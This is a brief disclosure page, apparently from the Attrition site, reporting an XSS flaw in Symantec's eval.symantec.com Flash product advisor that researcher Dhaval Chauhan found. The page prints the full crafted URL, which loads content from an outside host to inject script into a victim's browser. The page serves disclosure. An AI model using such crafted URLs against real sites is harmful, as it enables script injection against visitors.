XSS in eval.symantec.com


Dhaval Chauhan

http://eval.symantec.com/flashdemos/products/es_product_advisor/es_product_advisor.swf?transURL=symsans_eng.swf&cont entURL=http://dracuno.website.org/espa_cont.xml&imgURL=img/

Security researcher Dhaval Chauhan reported an XSS vulnerability in Symantec's eval.symantec.com website. After visiting a specially crafted URL and clicking through certain options in the Flash media presented, the injected code is executed in the victim's browser.

Symantec offers "industry-leading Web protection" through their various software, appliance, and service offerings.

main page ATTRITION feedback